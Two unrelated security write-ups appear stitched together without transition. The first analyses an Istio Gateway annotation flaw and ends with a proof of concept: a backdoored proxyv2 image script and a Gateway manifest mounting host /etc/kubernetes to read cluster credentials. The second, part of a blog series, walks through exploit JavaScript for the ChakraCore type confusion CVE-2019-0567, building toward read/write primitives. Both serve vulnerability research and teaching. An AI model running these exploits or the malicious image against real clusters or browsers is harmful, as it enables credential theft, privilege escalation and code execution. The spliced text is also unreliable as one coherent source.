istiod creates a MutatingWebhook and, in general, applies the mutating webhook to pod creation requests where the namespace has the label istio-injection: enabled and sidecar.istio.io/inject != false.

apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: istio-sidecar-injector
webhooks:
[...]
  namespaceSelector:
    matchExpressions:
    - key: istio-injection
      operator: In
      values:
      - enabled
  objectSelector:
    matchExpressions:
    - key: sidecar.istio.io/inject
      operator: NotIn
      values:
      - "false"
[...]
  rules:
  - apiGroups:
    - ""
    apiVersions:
    - v1
    operations:
    - CREATE
    resources:
    - pods
    scope: '*'
  sideEffects: None
  timeoutSeconds: 10

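When we submit an operation that creates a pod matching these rules, the istiod webhook receives a request from the Kubernetes dynamic admission controller containing an AdmissionReview resource. istiod parses the annotations of the pod in it and, before injecting the sidecar, uses the injectRequired function (pkg/kube/inject/inject.go:169) to check that the pod does not use hostNetwork, that it is not in the list of namespaces ignored by default, and whether it carries sidecar.istio.io/inject in its annotations/labels. If sidecar.istio.io/inject is true, the sidecar is injected. As an aside, the namespace label alone also triggers injection because InjectionPolicy defaults to Enabled.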
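The decision described above can be sketched as a simplified model. This is not Istio's code: the parameter names ignoredNamespaces and policy are illustrative, only the literal string "true" is treated as opting in, and preferring the label over the annotation when both are present is an assumption of this sketch.

```javascript
// Simplified model of the injection decision; not Istio's implementation.
// ignoredNamespaces and policy are illustrative parameters.
function injectRequired(ignoredNamespaces, policy, pod) {
  if (pod.spec.hostNetwork) return false; // hostNetwork pods are skipped
  if (ignoredNamespaces.includes(pod.metadata.namespace)) return false;

  const key = "sidecar.istio.io/inject";
  const labels = pod.metadata.labels || {};
  const annotations = pod.metadata.annotations || {};
  // Assumption: the label wins when both label and annotation are set.
  const raw = key in labels ? labels[key] : annotations[key];

  // No explicit value: fall back to the policy default.
  if (raw === undefined) return policy === "enabled";
  return String(raw).toLowerCase() === "true";
}

const pod = {
  metadata: { namespace: "istio-ingress", labels: { "sidecar.istio.io/inject": "true" } },
  spec: { hostNetwork: false },
};
console.log(injectRequired(["kube-system"], "enabled", pod));
```

With the policy set to "enabled", a pod that says nothing at all is still injected, which matches the remark that the namespace label alone is enough.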

inject_code

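With those conditions understood, we move on to the code that performs the actual sidecar injection. The implementation is in the RunTemplate function (pkg/kube/inject/inject.go:283). The earlier operations merge the config, run some checks to make sure the annotations are well formed, and strip down the pod struct. Focus on the code after templatePod: selectTemplates extracts the templateNames to render, which are then rendered by parseTemplate. The code of both functions is shown below.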

template_render

The value of the inject.istio.io/templates annotation is taken as the templateName. params.pod.Annotations has type map[string]string, and the usual values are sidecar or gateway.

func selectTemplates(params InjectionParameters) []string {
    // annotation.InjectTemplates.Name = inject.istio.io/templates
    if a, f := params.pod.Annotations[annotation.InjectTemplates.Name]; f {
        names := []string{}
        for _, tmplName := range strings.Split(a, ",") {
            name := strings.TrimSpace(tmplName)
            names = append(names, name)
        }
        return resolveAliases(params, names)
    }
    return resolveAliases(params, params.defaultTemplate)
}
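To make the behaviour of the selection logic concrete, here is a JavaScript rendering of it. It is a sketch, not Istio code: alias resolution (resolveAliases) is left out, and the defaultTemplates parameter stands in for params.defaultTemplate.

```javascript
// JavaScript rendering of the selection logic, without alias resolution.
// defaultTemplates stands in for params.defaultTemplate.
function selectTemplates(annotations, defaultTemplates) {
  const key = "inject.istio.io/templates";
  if (key in annotations) {
    // Comma-separated list, each entry trimmed of surrounding whitespace.
    return annotations[key].split(",").map((name) => name.trim());
  }
  return defaultTemplates;
}

console.log(selectTemplates({}, ["sidecar"]));
console.log(selectTemplates({ "inject.istio.io/templates": "gateway, sidecar" }, ["sidecar"]));
```

Whoever controls the pod's annotations therefore controls which templates are rendered.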

The Go template package is used to render the YAML file.

func parseTemplate(tmplStr string, funcMap map[string]interface{}, data SidecarTemplateData) (bytes.Buffer, error) {
    var tmpl bytes.Buffer
    temp := template.New("inject")
    t, err := temp.Funcs(sprig.TxtFuncMap()).Funcs(funcMap).Parse(tmplStr)
    if err != nil {
        log.Infof("Failed to parse template: %v %v\n", err, tmplStr)
        return bytes.Buffer{}, err
    }
    if err := t.Execute(&tmpl, &data); err != nil {
        log.Infof("Invalid template: %v %v\n", err, tmplStr)
        return bytes.Buffer{}, err
    }

    return tmpl, nil
}

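So where does this tmplStr come from? Istio stores it in a ConfigMap at initialization time, and we can retrieve the template by running kubectl describe cm -n istio-system istio-sidecar-injector. A few points in the sidecar template deserve attention: many sensitive values are taken from annotations.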

template_1

template_2

Experienced researchers who see userVolume below can probably guess roughly how the attack is carried out.

sidecar.istio.io/proxyImage
sidecar.istio.io/userVolume
sidecar.istio.io/userVolumeMount

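gateway deployment controller annotation propagation

Looking at the mitigations in the official bulletin, one of them is to set the PILOT_ENABLE_GATEWAY_API_DEPLOYMENT_CONTROLLER environment variable to false, and another is to delete the gateways.gateway.networking.k8s.io CRD, so the vulnerability is very likely related to creating gateways resources. Browsing the official documentation, I noticed the sentence shown in the figure below: annotations on a Gateway resource are passed on to the Service and Deployment resources.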

istio_docs

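With propagation in the picture, the exploitation condition falls into place: we need the CREATE permission on the gateways.gateway.networking.k8s.io resource. Next, let's analyze how the gateway passes annotations and labels along. As you might guess, it again uses Go templates to render a built-in template. Look directly at the configureIstioGateway function (pilot/pkg/config/kube/gateway/deploymentcontroller.go), whose main job is to render the Service and Deployment that the gateway needs from the templates in embed.FS. The template file is at pilot/pkg/config/kube/gateway/templates/deployment.yaml, and reading it shows that the annotations in the template are also taken from the annotations passed down from the parent resource. toYamlMap merges maps, and note that (strdict "inject.istio.io/templates" "gateway") comes before .Annotations, so by controlling the Gateway's annotations we can override the templates value and choose which template is rendered.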

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    {{ toYamlMap .Annotations | nindent 4 }}
  labels:
    {{ toYamlMap .Labels
      (strdict "gateway.istio.io/managed" "istio.io-gateway-controller")
      | nindent 4}}
  name: {{.Name}}
  namespace: {{.Namespace}}
  ownerReferences:
  - apiVersion: gateway.networking.k8s.io/v1alpha2
    kind: Gateway
    name: {{.Name}}
    uid: {{.UID}}
spec:
  selector:
    matchLabels:
      istio.io/gateway-name: {{.Name}}
  template:
    metadata:
      annotations:
        {{ toYamlMap
          (strdict "inject.istio.io/templates" "gateway")
          .Annotations
          | nindent 8}}
      labels:
        {{ toYamlMap
          (strdict "sidecar.istio.io/inject" "true")
          (strdict "istio.io/gateway-name" .Name)
          .Labels
          | nindent 8}}
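The effect of that argument order can be shown with a minimal model of the merge. The toYamlMap function below is a stand-in that only reproduces the "later maps overwrite earlier keys" behaviour described in the text; it is not Istio's implementation and does no YAML rendering.

```javascript
// Model of the merge order only: later maps overwrite earlier keys.
// toYamlMap here is a stand-in, not Istio's implementation.
function toYamlMap(...maps) {
  return Object.assign({}, ...maps);
}

// Annotations set by whoever created the Gateway resource.
const gatewayAnnotations = { "inject.istio.io/templates": "sidecar" };

const podAnnotations = toYamlMap(
  { "inject.istio.io/templates": "gateway" }, // controller default, listed first
  gatewayAnnotations                          // .Annotations, listed last
);

console.log(podAnnotations["inject.istio.io/templates"]); // sidecar
```

Because the user-supplied map is merged last, the controller's default of "gateway" is replaced by the value from the Gateway's own annotations.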

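Exploitation

With the details of the exploit chain in hand, we can lay out the whole approach: create a Gateway resource with carefully crafted annotations together with a malicious proxyv2 image, and "trick" the controller into creating an unintended pod that can access sensitive files on the host, such as the Docker UNIX socket.

Test environment: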

istio v1.12.2
kubernetes v1.20.14
kubernetes gateway-api v0.4.0
Use the commands below to create a write-only role and initialize Istio:

curl -L https://istio.io/downloadIstio | ISTIO_VERSION=1.12.2 TARGET_ARCH=x86_64 sh -
istioctl x precheck
istioctl install --set profile=demo -y
kubectl create namespace istio-ingress
kubectl create -f - << EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: gateways-only-create
rules:
- apiGroups: ["gateway.networking.k8s.io"]
  resources: ["gateways"]
  verbs: ["create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: test-gateways-only-create
subjects:
- kind: User
  name: test
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: gateways-only-create
  apiGroup: rbac.authorization.k8s.io
EOF

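Before exploiting the vulnerability, we need to build a malicious Docker image. Here I chose the proxyv2 image as the base, replaced /usr/local/bin/pilot-agent in it with a bash script, then tagged it and pushed it to a local registry or to docker.io; either works.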

docker run -it  --entrypoint /bin/sh istio/proxyv2:1.12.1
cp /usr/local/bin/pilot-agent /usr/local/bin/pilot-agent-orig
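# Quote the heredoc delimiter so $1 and $@ are written literally into the
# script instead of being expanded by the current shell.
cat << 'EOF' > /usr/local/bin/pilot-agent
#!/bin/bash

echo "$1"
if [ "$1" != "istio-iptables" ]
then
    touch /tmp/test/pwned
    ls -lha /tmp/test/*
    cat /tmp/test/*
fi

/usr/local/bin/pilot-agent-orig "$@"
EOF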
chmod +x /usr/local/bin/pilot-agent
exit
docker tag 0e87xxxxcc5c xxxx/proxyv2:malicious

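Before committing, remember to change the image's entrypoint to /usr/local/bin/pilot-agent.

Then use the commands below to carry out the attack. Note that I override inject.istio.io/templates in the annotations with sidecar, so that when the Kubernetes controller creates the pod, its inject.istio.io/templates annotation is also sidecar, and istiod's inject webhook renders the pod resource using the sidecar template. With sidecar.istio.io/userVolume and sidecar.istio.io/userVolumeMount I mount the /etc/kubernetes directory. Combined with the malicious image above, the effect of the PoC is to print the credentials and configuration files under /etc/kubernetes on the host. Using the kubelet credentials or an admin token, you can escalate privileges and take over the whole cluster. You could also mount docker.sock for a more complete exploit.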

kubectl --as test create -f - << EOF
apiVersion: gateway.networking.k8s.io/v1alpha2
kind: Gateway
metadata:
  name: gateway
  namespace: istio-ingress
  annotations:
    inject.istio.io/templates: sidecar
    sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
    sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
    sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
spec:
  gatewayClassName: istio
  listeners:
  - name: default
    hostname: "*.example.com"
    port: 80
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: All
EOF

After the Gateway is created, the istiod inject webhook creates the pod just as we asked.

gateway_pod_yaml

docker_image

The Deployment is finally rendered as follows:

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
    inject.istio.io/templates: sidecar
    [...]
    sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
    sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
    sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
  generation: 1
  labels:
    gateway.istio.io/managed: istio.io-gateway-controller
  name: gateway
  namespace: istio-ingress
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      istio.io/gateway-name: gateway
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
    metadata:
      annotations:
        inject.istio.io/templates: sidecar
        [...]
        sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
        sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
        sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
      creationTimestamp: null
      labels:
        istio.io/gateway-name: gateway
        sidecar.istio.io/inject: "true"
    spec:
      containers:
      - image: auto
        imagePullPolicy: Always
        name: istio-proxy
        ports:
        - containerPort: 15021
          name: status-port
          protocol: TCP
        readinessProbe:
          failureThreshold: 10
          httpGet:
            path: /healthz/ready
            port: 15021
            scheme: HTTP
          periodSeconds: 2
          successThreshold: 1
          timeoutSeconds: 2
        resources: {}
        securityContext:
          allowPrivilegeEscalation: true
          capabilities:
            add:
            - NET_BIND_SERVICE
            drop:
            - ALL
          readOnlyRootFilesystem: true
          runAsGroup: 1337
          runAsNonRoot: false
          runAsUser: 0
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

Attack result: the kubernetes directory is successfully mounted under /tmp/test, and the apiserver credentials are visible.

pwned

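Summary

Although John Howard, during our friendly exchange, repeatedly asked me how this differs from a user creating a pod directly, I still think the whole process counts as a new privilege escalation technique.

As new Kubernetes APIs are incubated by the SIGs and more cloud-native components join the ecosystem, this kind of roundabout permission overflow is bound to appear wherever context is passed along. I think the controllers of cloud-native components also deserve to be a focus of auditing.

Is this case useful in practice? I think the odds of reproducing this exact exploitation process are slim, unless you happen to run into such a scenario in infrastructure. Kubernetes' declarative API, combined with a huge number of components watching for resource changes, opens up endless possibilities; perhaps in real engagements a restricted read or write on a resource can be turned into a privilege escalation vulnerability.

References: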

  1. https://gateway-api.sigs.k8s.io/
  2. https://istio.io/latest/docs/reference/config/annotations/
  3. https://istio.io/latest/news/security/istio-security-2022-002/
  4. https://istio.io/latest/docs/tasks/traffic-management/ingress/gateway-api/

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 2)

16 March 2022 at 00:00

Introduction

In part one we went over setting up a ChakraCore exploit development environment, understanding how JavaScript (more specifically, the Chakra/ChakraCore engine) manages dynamic objects in memory, and vulnerability analysis of CVE-2019-0567 - a type confusion vulnerability that affects Chakra-based Microsoft Edge and ChakraCore. In this post, part two, we will pick up where we left off and begin by taking our proof-of-concept script, which “crashes” Edge and ChakraCore as a result of the type confusion vulnerability, and converting it into a read/write primitive. This primitive will then be used to gain code execution against ChakraCore and the ChakraCore shell, ch.exe, which essentially is a command-line JavaScript shell that allows execution of JavaScript. For our purposes, we can think of ch.exe as Microsoft Edge, but without the visuals. Then, in part three, we will port our exploit to Microsoft Edge to gain full code execution.

This post will also be dealing with ASLR, DEP, and Control Flow Guard (CFG) exploit mitigations. As we will see in part three, when we port our exploit to Edge, we will also have to deal with Arbitrary Code Guard (ACG). However, this mitigation isn’t enabled within ChakraCore - so we won’t have to deal with it within this blog post.

Lastly, before beginning this portion of the blog series, much of what is used in this blog post comes from Bruno Keith’s amazing work on this subject, as well as the Perception Point blog post on the “sister” vulnerability to CVE-2019-0567. With that being said, let’s go ahead and jump right into it!

ChakraCore/Chakra Exploit Primitives

Let’s recall the memory layout, from part one, of our dynamic object after the type confusion occurs.

As we can see above, we have overwritten the auxSlots pointer with a value we control, of 0x1234. Additionally, recall from part one of this blog series when we talked about JavaScript objects. A value in JavaScript is 64-bits (technically), but only 32-bits are used to hold the actual value (in the case of 0x1234, the value is represented in memory as 001000000001234). This is a result of “NaN boxing”, where JavaScript encodes type information in the upper 17-bits of the value. We also know that anything that isn’t a static object (generally speaking) is a dynamic object. We know that dynamic objects are “the exception to the rule”, and are actually represented in memory as a pointer. We saw this in part one by dissecting how dynamic objects are laid out in memory (e.g. object points to | vtable | type | auxSlots |).
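The in-memory form of 0x1234 quoted above can be reproduced with a few lines of BigInt arithmetic. This is a sketch under an assumption: it models the integer tag as a single bit at position 48, which is consistent with the value shown in the text but is not taken from the ChakraCore sources. The names INT_TAG, tagInt32, and isTaggedInt are illustrative.

```javascript
// Assumption: the integer tag is bit 48 (0x0001 in the top 16 bits).
const INT_TAG = 1n << 48n;

// Tag a 32-bit integer so it matches how the text shows 0x1234 in memory.
function tagInt32(value) {
  return INT_TAG | BigInt(value >>> 0);
}

// In this model a tagged integer is recognised by its top 16 bits.
function isTaggedInt(word) {
  return (word >> 48n) === 1n;
}

const word = tagInt32(0x1234);
console.log(word.toString(16).padStart(16, "0")); // 0001000000001234
console.log(isTaggedInt(word));                   // true
```

A real heap pointer has neither tag bits set, which is why an untagged 64-bit word is treated as a pointer to a dynamic object.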

What this means for our vulnerability is that we can overwrite the auxSlots pointer currently, but we can only overwrite it with a value that is NaN-boxed, meaning we can’t hijack the object with anything particularly interesting, as we are on a 64-bit machine but we can only overwrite the auxSlots pointer with a 32-bit value in our case, when using something like 0x1234.

The above is only a half truth, as we can use some “hacks” to actually end up controlling this auxSlots pointer with something interesting, actually with a “chain” of interesting items, to force ChakraCore to do something nefarious - which will eventually lead us to code execution.

Let’s update our proof-of-concept, which we will save as exploit.js, with the following JavaScript:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);		// Instead of supplying 0x1234, we are supplying our obj
}

main();

Our exploit.js is slightly different than our original proof-of-concept. When the type confusion is exploited, we now are supplying obj instead of a value of 0x1234. In not so many words, the auxSlots pointer of our o object, previously overwritten with 0x1234 in part one, will now be overwritten with the address of our obj object. Here is where this gets interesting.

Recall that any object that isn’t NaN-boxed is considered a pointer. Since obj is a dynamic object, it is represented in memory as such:

What this means is that instead of our corrupted o object after the type confusion being laid out as such:

It will actually look like this in memory:

Our o object, whose auxSlots pointer we can corrupt, now technically has a valid pointer in the auxSlots location within the object. However, we can clearly see that the o->auxSlots pointer isn’t pointing to an array of properties, it is actually pointing to the obj object which we created! Our exploit.js script essentially updates o->auxSlots to o->auxSlots = addressof(obj). This essentially means that o->auxSlots now contains the memory address of the obj object, instead of a valid auxSlots array address.

Recall also that we control the o properties, and can call them at any point in exploit.js via o.a, o.b, etc. For instance, if there was no type confusion vulnerability, and if we wanted to fetch the o.a property, we know this is how it would be done (considering o had been type transitioned to an auxSlots setup):

We know this to be the case, as we are well aware ChakraCore will dereference dynamic_object+0x10 to pull the auxSlots pointer. After retrieving the auxSlots pointer, ChakraCore will add the appropriate index to the auxSlots address to fetch a given property, such as o.a, which is stored at offset 0 or o.b, which is stored at offset 0x8. We saw this in part one of this blog series, and this is no different than how any other array stores and fetches an appropriate index.

What’s most interesting about all of this is that ChakraCore will still act on our o object as if the auxSlots pointer is still valid and hasn’t been corrupted. After all, this was the root cause of our vulnerability in part one. When we acted on o.a, after corrupting auxSlots to 0x1234, an access violation occurred, as 0x1234 is invalid memory.

This time, however, we have provided valid memory within o->auxSlots. So acting on o.a would actually take the address stored at auxSlots, dereference it, and then return the value stored at offset 0. Doing this currently, with our obj object being supplied as the auxSlots pointer for our corrupted o object, will actually return the vftable from our obj object. This is because the first 0x10 bytes of a dynamic object contain metadata, like vftable and type. Since ChakraCore is treating our obj as an auxSlots array, which can be indexed directly at an offset of 0, via auxSlots[0], we can actually interact with this metadata. This can be seen below.

Usually we can expect the dereferenced contents of o+0x10, a.k.a. auxSlots, at an offset of 0, to contain the actual, raw value of o.a. After the type confusion vulnerability is used to corrupt auxSlots with a different address (the address of obj), whatever is stored at this address, at an offset of 0, is dereferenced and returned to whatever part of the JavaScript code is trying to retrieve the value of o.a. Since we have corrupted auxSlots with the address of an object, ChakraCore doesn’t know auxSlots is gone, and it will still gladly index whatever is at auxSlots[0] when the script tries to access the first property (in this case o.a), which is the vftable of our obj object. If we retrieved o.b, after our type confusion was executed, ChakraCore would fetch the type pointer.
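The confusion can be modelled with a toy heap to make the indexing explicit. Everything in this sketch is made up for illustration: the addresses, the pointer values, and the helper names makeObject and getSlot. It only mirrors the | vftable | type | auxSlots | layout and the "dereference object+0x10, then index" fetch described above.

```javascript
// Toy heap: address -> 64-bit word. All addresses and values are made up.
const heap = new Map();
const write = (addr, value) => heap.set(addr, value);
const read = (addr) => heap.get(addr);

// Lay out a dynamic object as | vftable | type | auxSlots |.
function makeObject(addr, vftable, type, auxSlots) {
  write(addr + 0x00n, vftable);
  write(addr + 0x08n, type);
  write(addr + 0x10n, auxSlots);
  return addr;
}

// Property fetch as described: dereference object+0x10, then index the result.
function getSlot(objAddr, index) {
  const auxSlots = read(objAddr + 0x10n);
  return read(auxSlots + BigInt(index) * 8n);
}

const OBJ_VFTABLE = 0x7ff800001000n; // pretend pointer into chakracore.dll
const OBJ_TYPE = 0x20000000100n;     // pretend type pointer
const obj = makeObject(0x1000n, OBJ_VFTABLE, OBJ_TYPE, 0x3000n);
const o = makeObject(0x2000n, 0x7ff800002000n, 0x20000000200n, 0x4000n);

// The type confusion: o->auxSlots = addressof(obj).
write(o + 0x10n, obj);

console.log(getSlot(o, 0).toString(16)); // o.a now reads obj's vftable
console.log(getSlot(o, 1).toString(16)); // o.b now reads obj's type pointer
```

In the model, slot 2 of the corrupted o would land on obj's own auxSlots pointer, since it sits at offset 0x10 of obj.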

Let’s inspect this in the debugger, to make more sense of this. Do not worry if this has yet to make sense. Recall from part one, the function chakracore!Js::DynamicTypeHandler::AdjustSlots is responsible for the type transition of our o object. Let’s set a breakpoint on our print() statement, as well as the aforementioned function so that we can examine the call stack to find the machine code (the JIT’d code) which corresponds to our opt() function. This is all information we learned in part one.

After opening ch.exe and passing in exploit.js as the argument (the script to be executed), we set a breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution and hitting the breakpoint, we then can set our intended breakpoint of chakracore!Js::DynamicTypeHandler::AdjustSlots.

When the chakracore!Js::DynamicTypeHandler::AdjustSlots breakpoint is hit, we can examine the call stack (just like in part one) to identify our “JIT’d” opt() function.

After retrieving the address of our opt() function, we can unassemble the code to set a breakpoint where our type confusion vulnerability reaches the apex - on the mov qword ptr [r15+10h], r11 instruction when auxSlots is overwritten.

We know that auxSlots is stored at o+0x10, so this means our o object is currently in R15. Let’s examine the object’s layout in memory, currently.

We can clearly see that this is the o object. Looking at the R11 register, which is the value that is going to corrupt auxSlots of o, we can see that it is the obj object we created earlier.

Notice what happens to the o object, as our vulnerability manifests. When o->auxSlots is corrupted, o.a now refers to the vftable property of our obj object.

Anytime we act on o.a, we will now be acting on the vftable of obj! This is great, but how can we take this further? Take note that the vftable is actually a user-mode address that resides within chakracore.dll. This means, if we were able to leak a vftable from an object, we would bypass ASLR. Let’s see how we can possibly do this.

DataView Objects

A popular object leveraged for exploitation is a DataView object. A DataView object provides users a way to read/write multiple different data types and endianness to and from a raw buffer in memory, which can be created with ArrayBuffer. This can include writing or retrieving 8-bit, 16-bit, 32-bit, or (in some browsers) 64-bit values of raw data from said buffer. More information about DataView objects can be found here, for the more interested reader.

At a higher level a DataView object provides a set of methods that allow a developer to be very specific about the kind of data they would like to set, or retrieve, in a buffer created by ArrayBuffer. For instance, with the method getUint32(), provided by DataView, we can tell ChakraCore that we would like to retrieve the contents of the ArrayBuffer backing the DataView object as a 32-bit, unsigned data type, and even go as far as asking ChakraCore to return the value in little-endian format, and even specifying a specific offset within the buffer to read from. A list of methods provided by DataView can be found here.

The previous information provided makes a DataView object extremely attractive, from an exploitation perspective, as not only can we set and read data from a given buffer, we can specify the data type, offset, and even endianness. More on this in a bit.

Moving on, a DataView object could be instantiated as such below:

dataviewObj = new DataView(new ArrayBuffer(0x100));

This would essentially create a DataView object that is backed by a buffer, via ArrayBuffer.

This matters greatly to us because as of now if we want to overwrite auxSlots with something (referring to our vulnerability), it would either have to be a raw JavaScript value, like an integer, or the address of a dynamic object like the obj used previously. Even if we had some primitive to leak the base address of kernel32.dll, for instance, we could never actually corrupt the auxSlots pointer by directly overwriting it with the leaked address of 0x7fff5b3d0000 for instance, via our vulnerability. This is because of NaN-boxing - meaning if we try to directly overwrite the auxSlots pointer so that we can arbitrarily read or write from this address, ChakraCore would still “tag” this value, which would “mangle it” so that it no longer is represented in memory as 0x7fff5b3d0000. We can clearly see this if we first update exploit.js to the following and pause execution when auxSlots is corrupted:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x7fff5b3d0000);		// Instead of supplying 0x1234 or a fake object address, supply the base address of kernel32.dll
}

Using the same breakpoints and method for debugging, shown in the beginning of this blog, we can locate the JIT’d address of the opt() function and pause execution on the instruction responsible for overwriting auxSlots of the o object (in this case mov qword ptr [r15+10h], r13).

Notice how the value we supplied, originally 0x7fff5b3d0000, has been totally mangled by the time it was placed into the R13 register. This is because ChakraCore is embedding type information into the upper 17-bits of the 64-bit value (where only 32-bits technically are available to store a raw value). Seeing this, it is clear we can’t directly set values for exploitation: since we are exploiting a 64-bit system, we need to be able to write full 64-bit values without having the address/value mangled. This means even if we can reliably leak data, we can’t write this leaked data to memory, as we have no way to avoid JavaScript NaN-boxing the value. This leaves us with the following choices:

  1. Write a NaN-boxed value to memory
  2. Write a dynamic object to memory (which is represented by a pointer)

If we chain together a few JavaScript objects, we can use the latter option shown above to corrupt a few things in memory with the addresses of objects to achieve a read/write primitive. Let’s start this process by examining how DataView objects behave in memory.
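To make the mangling described earlier a little more concrete, here is a rough sketch that can be run in any JavaScript engine. It only shows the plain IEEE-754 double encoding of the Number 0x7fff5b3d0000, under the assumption that a value this large is stored as a double rather than as a tagged integer. It does not model the extra tag bits ChakraCore applies on top, so the bytes seen in WinDbg will differ again from what this prints. The point is simply that the raw pointer bits never reach memory unchanged.

```javascript
// Illustrative only: show how the Number 0x7fff5b3d0000 is encoded as an IEEE-754 double
const scratch = new DataView(new ArrayBuffer(8));
const address = 0x7fff5b3d0000;

// Store the Number as a 64-bit double (big-endian, so the high half comes first)
scratch.setFloat64(0, address, false);

const hi = scratch.getUint32(0, false);   // upper 32 bits of the encoding
const lo = scratch.getUint32(4, false);   // lower 32 bits of the encoding

console.log("raw pointer we wanted: 0x" + address.toString(16));
console.log("double encoding:       0x" + hi.toString(16).padStart(8, "0") + lo.toString(16).padStart(8, "0"));
```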

Let’s create a new JavaScript script named dataview.js:

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify little-endian (true)

Notice the level of control we have in respect to the amount of data, the type of data, and the offset of the data in the buffer we can set/retrieve.

In the above code we created a DataView object, which is backed by a raw memory buffer via ArrayBuffer. With the DataView “view” of this buffer, we can tell ChakraCore to start at the beginning of the buffer, use a 32-bit, unsigned data type, and use little endian format when setting the data 0x41414141 into the buffer created by ArrayBuffer. To see this in action, let’s execute this script in WinDbg.

Next, let’s set our print() debug breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution, let’s then set a breakpoint on chakracore!Js::DataView::EntrySetUint32, which is responsible for setting a value on a DataView buffer. Please note I was able to find this function by searching the ChakraCore code base, which is open-sourced and available on GitHub, within DataView.cpp, which looked to be responsible for setting values on DataView objects.

After hitting the breakpoint on chakracore!Js::DataView::EntrySetUint32, we can look further into the disassembly to see a method provided by DataView called SetValue(). Let’s set a breakpoint here.

After hitting the breakpoint, we can view the disassembly of this function below. We can see another call to a method called SetValue(). Let’s set a breakpoint on this function (please right click and open the below image in a new tab if you have trouble viewing).

After hitting the breakpoint, we can see the source of the SetValue() method function we are currently in, outlined in red below.

Cross-referencing this with the disassembly, we notice that right before the ret from this method there is a mov dword ptr [rax], ecx instruction. This instruction writes a 32-bit value (ECX) to the memory pointed to by a 64-bit address (RAX). This is likely the operation which writes our 32-bit value to the buffer of the DataView object. We can confirm this by setting a breakpoint and verifying that, in fact, this is the responsible instruction.

We can see our buffer now holds 0x41414141.

This verifies that it is possible to set an arbitrary 32-bit value without any sort of NaN-boxing, via DataView objects. Also note the address of the buffer property of the DataView object, 0x157af16b2d0. However, what about a 64-bit value? Consider the following script below, which attempts to set one 64-bit value via offsets of DataView.

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify little-endian (true)
dataviewObj.setUint32(0x4, 0x41414141, true);	// Set, at an offset of 4 in the buffer, the value 0x41414141 and specify little-endian (true)

Using the exact same methodology as before, we can return to our mov dword ptr [rax], ecx instruction, which writes our data to the buffer, to see that using DataView objects it is possible to set a value in JavaScript as a contiguous 64-bit value without NaN-boxing and without being restricted to just a JavaScript object address!

The only thing we are “limited” to is the fact we cannot set a 64-bit value in “one go”, and we must divide our writes/reads into two tries, since we can only read/write 32-bits at a time as a result of the methods provided to us by DataView. However, there is currently no way for us to abuse this functionality, as we can only perform these actions inside a buffer of a DataView object, which is not a security vulnerability. We will eventually see how we can use our type confusion vulnerability to achieve this, later in this blog post.
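The two-step write described above can be sketched as follows. The helper names setUint64Halves and getUint64Halves are hypothetical and only exist for this illustration; they wrap the standard setUint32() and getUint32() methods and nothing more.

```javascript
// Illustrative only: build one contiguous 64-bit value out of two 32-bit writes
const dv = new DataView(new ArrayBuffer(0x10));

// Hypothetical helper: write a 64-bit value given as (lo, hi) halves at `offset`
function setUint64Halves(view, offset, lo, hi) {
    view.setUint32(offset, lo, true);        // lower 4 bytes
    view.setUint32(offset + 4, hi, true);    // upper 4 bytes
}

// Hypothetical helper: read the two halves back
function getUint64Halves(view, offset) {
    return { lo: view.getUint32(offset, true), hi: view.getUint32(offset + 4, true) };
}

setUint64Halves(dv, 0x0, 0x5b3d0000, 0x00007fff);
const halves = getUint64Halves(dv, 0x0);
console.log("0x" + halves.hi.toString(16) + halves.lo.toString(16).padStart(8, "0"));
```

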